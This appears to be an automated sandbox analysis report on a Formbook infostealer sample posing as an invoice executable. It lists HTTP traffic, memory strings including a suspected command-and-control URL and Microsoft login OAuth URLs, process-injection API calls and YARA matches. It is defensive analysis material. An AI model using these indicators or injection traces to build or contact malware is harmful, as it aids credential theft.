Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 27 Sep 2024 07:08:48 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 27 Sep 2024 07:08:51 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 27 Sep 2024 07:08:53 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->

Source: MUjPkRkjOWKkX.exe, 00000007.00000002.3292411346.0000000001275000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.nodigitalsmoke.org
Source: MUjPkRkjOWKkX.exe, 00000007.00000002.3292411346.0000000001275000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.nodigitalsmoke.org/pnbu/
Source: replace.exe, 00000005.00000003.2713427393.00000000072AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: replace.exe, 00000005.00000003.2713427393.00000000072AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: replace.exe, 00000005.00000003.2713427393.00000000072AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: replace.exe, 00000005.00000003.2713427393.00000000072AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: replace.exe, 00000005.00000003.2713427393.00000000072AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: replace.exe, 00000005.00000003.2713427393.00000000072AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: replace.exe, 00000005.00000003.2713427393.00000000072AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: replace.exe, 00000005.00000002.3291550327.00000000025C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: replace.exe, 00000005.00000002.3291550327.00000000025C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: replace.exe, 00000005.00000002.3291550327.00000000025C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf
Source: replace.exe, 00000005.00000002.3291550327.00000000025C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: replace.exe, 00000005.00000002.3291550327.00000000025C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: replace.exe, 00000005.00000002.3291550327.00000000025C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: replace.exe, 00000005.00000002.3291550327.000000000259E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: replace.exe, 00000005.00000003.2706454886.000000000728B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: replace.exe, 00000005.00000003.2713427393.00000000072AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: replace.exe, 00000005.00000003.2713427393.00000000072AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: MUjPkRkjOWKkX.exe, 00000007.00000002.3293199751.00000000035D6000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.strato.de

Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe

Code function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_0045A10F

Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe

Code function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_0045A10F

Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe

Code function: 0_2_0046DC80 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,

0_2_0046DC80

Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe

Code function: 0_2_0044C37A GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,SendInput,

0_2_0044C37A

Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe

Code function: 0_2_0047C81C SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_0047C81C

E-Banking Fraud

Malicious sample detected (through community Yara rule)

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2536793601.0000000008050000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3292716261.0000000003D00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3291336208.0000000002120000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2532355748.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3292632667.00000000027D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2532985374.0000000004FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3292694436.0000000002820000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3292411346.0000000001220000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.2536793601.0000000008050000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.3292716261.0000000003D00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.3291336208.0000000002120000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.2532355748.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.3292632667.00000000027D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.2532985374.0000000004FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.3292694436.0000000002820000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000007.00000002.3292411346.0000000001220000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: Revised Invoice H000127896.exe

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0042C303 NtClose,	2_2_0042C303
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872B60 NtClose,LdrInitializeThunk,	2_2_03872B60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872DF0 NtQuerySystemInformation,LdrInitializeThunk,	2_2_03872DF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872C70 NtFreeVirtualMemory,LdrInitializeThunk,	2_2_03872C70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038735C0 NtCreateMutant,LdrInitializeThunk,	2_2_038735C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03874340 NtSetContextThread,	2_2_03874340
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03874650 NtSuspendThread,	2_2_03874650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872B80 NtQueryInformationFile,	2_2_03872B80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872BA0 NtEnumerateValueKey,	2_2_03872BA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872BE0 NtQueryValueKey,	2_2_03872BE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872BF0 NtAllocateVirtualMemory,	2_2_03872BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872AB0 NtWaitForSingleObject,	2_2_03872AB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872AD0 NtReadFile,	2_2_03872AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872AF0 NtWriteFile,	2_2_03872AF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872F90 NtProtectVirtualMemory,	2_2_03872F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872FA0 NtQuerySection,	2_2_03872FA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872FB0 NtResumeThread,	2_2_03872FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872FE0 NtCreateFile,	2_2_03872FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872F30 NtCreateSection,	2_2_03872F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872F60 NtCreateProcessEx,	2_2_03872F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872E80 NtReadVirtualMemory,	2_2_03872E80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872EA0 NtAdjustPrivilegesToken,	2_2_03872EA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872EE0 NtQueueApcThread,	2_2_03872EE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872E30 NtWriteVirtualMemory,	2_2_03872E30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872DB0 NtEnumerateKey,	2_2_03872DB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872DD0 NtDelayExecution,	2_2_03872DD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872D00 NtSetInformationFile,	2_2_03872D00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872D10 NtMapViewOfSection,	2_2_03872D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872D30 NtUnmapViewOfSection,	2_2_03872D30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872CA0 NtQueryInformationToken,	2_2_03872CA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872CC0 NtQueryVirtualMemory,	2_2_03872CC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872CF0 NtOpenProcess,	2_2_03872CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872C00 NtQueryInformationProcess,	2_2_03872C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872C60 NtCreateKey,	2_2_03872C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03873090 NtSetValueKey,	2_2_03873090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03873010 NtOpenDirectoryObject,	2_2_03873010
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038739B0 NtGetContextThread,	2_2_038739B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03873D10 NtOpenProcessToken,	2_2_03873D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03873D70 NtOpenThread,	2_2_03873D70
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02AB4340 NtSetContextThread,LdrInitializeThunk,	5_2_02AB4340
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02AB4650 NtSuspendThread,LdrInitializeThunk,	5_2_02AB4650
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02AB2AF0 NtWriteFile,LdrInitializeThunk,	5_2_02AB2AF0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02AB2AD0 NtReadFile,LdrInitializeThunk,	5_2_02AB2AD0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02AB2BA0 NtEnumerateValueKey,LdrInitializeThunk,	5_2_02AB2BA0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02AB2BE0 NtQueryValueKey,LdrInitializeThunk,	5_2_02AB2BE0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02AB2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	5_2_02AB2BF0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02AB2B60 NtClose,LdrInitializeThunk,	5_2_02AB2B60
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02AB2E80 NtReadVirtualMemory,LdrInitializeThunk,	5_2_02AB2E80
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02AB2EE0 NtQueueApcThread,LdrInitializeThunk,	5_2_02AB2EE0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02AB2FB0 NtResumeThread,LdrInitializeThunk,	5_2_02AB2FB0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02AB2FE0 NtCreateFile,LdrInitializeThunk,	5_2_02AB2FE0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02AB2F30 NtCreateSection,LdrInitializeThunk,	5_2_02AB2F30
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02AB2CA0 NtQueryInformationToken,LdrInitializeThunk,	5_2_02AB2CA0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02AB2C60 NtCreateKey,LdrInitializeThunk,	5_2_02AB2C60
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02AB2C70 NtFreeVirtualMemory,LdrInitializeThunk,	5_2_02AB2C70
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02AB2DF0 NtQuerySystemInformation,LdrInitializeThunk,	5_2_02AB2DF0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02AB2DD0 NtDelayExecution,LdrInitializeThunk,	5_2_02AB2DD0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02AB2D30 NtUnmapViewOfSection,LdrInitializeThunk,	5_2_02AB2D30
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02AB2D10 NtMapViewOfSection,LdrInitializeThunk,	5_2_02AB2D10
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02AB35C0 NtCreateMutant,LdrInitializeThunk,	5_2_02AB35C0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02AB39B0 NtGetContextThread,LdrInitializeThunk,	5_2_02AB39B0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02AB2AB0 NtWaitForSingleObject,	5_2_02AB2AB0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02AB2B80 NtQueryInformationFile,	5_2_02AB2B80
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02AB2EA0 NtAdjustPrivilegesToken,	5_2_02AB2EA0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02AB2E30 NtWriteVirtualMemory,	5_2_02AB2E30
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02AB2FA0 NtQuerySection,	5_2_02AB2FA0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02AB2F90 NtProtectVirtualMemory,	5_2_02AB2F90
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02AB2F60 NtCreateProcessEx,	5_2_02AB2F60
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02AB2CF0 NtOpenProcess,	5_2_02AB2CF0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02AB2CC0 NtQueryVirtualMemory,	5_2_02AB2CC0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02AB2C00 NtQueryInformationProcess,	5_2_02AB2C00
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02AB2DB0 NtEnumerateKey,	5_2_02AB2DB0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02AB2D00 NtSetInformationFile,	5_2_02AB2D00
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02AB3090 NtSetValueKey,	5_2_02AB3090
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02AB3010 NtOpenDirectoryObject,	5_2_02AB3010
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02AB3D10 NtOpenProcessToken,	5_2_02AB3D10
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02AB3D70 NtOpenThread,	5_2_02AB3D70
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02148EB0 NtReadFile,	5_2_02148EB0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02148FA0 NtDeleteFile,	5_2_02148FA0
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02148D40 NtCreateFile,	5_2_02148D40
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_02149040 NtClose,	5_2_02149040
Source: C:\Windows\SysWOW64\replace.exe	Code function: 5_2_021491B0 NtAllocateVirtualMemory,	5_2_021491B0

Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe

Code function: 0_2_00431BE8: GetFullPathNameW,__swprintf,_wcslen,CreateDirectoryW,CreateFileW,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,

0_2_00431BE8

Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe

Code function: 0_2_00446313 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_00446313

Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe

Code function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,

0_2_004333BE

Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe	Code function: 0_2_004096A0	0_2_004096A0
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe	Code function: 0_2_0042200C	0_2_0042200C
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe	Code function: 0_2_0041A217	0_2_0041A217
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe	Code function: 0_2_00412216	0_2_00412216
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe	Code function: 0_2_0042435D	0_2_0042435D
